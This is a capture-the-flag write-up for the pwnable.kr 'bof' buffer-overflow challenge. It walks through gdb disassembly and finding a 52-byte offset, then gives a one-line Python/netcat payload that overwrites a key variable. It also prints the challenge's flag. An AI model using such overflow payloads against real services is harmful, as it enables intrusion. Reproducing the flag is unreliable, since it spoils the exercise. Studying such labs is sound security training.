Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof
Exploit Server : pwnable.kr:9000
The source code of the bof binary is provided. I examine the source code and found out that we are going to replace the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you entered in the "overflowme" variable, the "key" is not changed as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.
Load the gdb with PEDA and check with "checksec". It is confirmed that the NX is enabled with another restrictions.
gdb -q ./bof
Run "disass main" to disassemble the "main" function.
Run "disass func" to disassembe the "func" function.
In the "func" function, the following codes that I am interested in.
0x00000649 <+29>: lea eax,[ebp-0x2c]
0x0000064c <+32>: mov DWORD PTR [esp],eax
0x0000064f <+35>: call 0x650
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>: jne 0x66b
The "eax,[ebp-0x2c]", "ebp-0x2c" may be contained the value of "overflowme" variable and saved in eax register.
The "DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" may be contained the value of "key", that is "0xdeadbeef".
I am going to set a breakpoint at "0x0000065b <+47>".
Then "r" run the program and is prompted for entering "helloworld" as the "overflowme".
After entering the "helloworld", I am going to examine the "eax" and "ebp+0x8".
The result confirmed what I suspected. I am going to check the offset the two addresses with Python. The offset is 52.
Once get the offset, I am going to overwrite the "0xdeadbeef" with "0xcafebabe" with the exploit code. The "cat" command is for the interactive with the shell.
(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000
The flag is :
daddy, I just pwned a buFFer :)
That's all! See you.